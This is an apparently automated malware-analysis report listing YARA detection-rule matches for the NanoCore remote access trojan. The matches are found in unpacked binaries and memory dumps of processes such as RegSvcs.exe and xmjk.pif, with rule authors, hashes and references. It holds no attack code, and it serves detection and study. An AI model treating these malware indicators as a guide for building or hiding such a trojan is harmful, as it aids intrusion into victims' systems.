        Source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.34de6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.34de6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.2f1c614.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.2f1c614.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.5900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.5900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.2f177b4.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.2f177b4.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
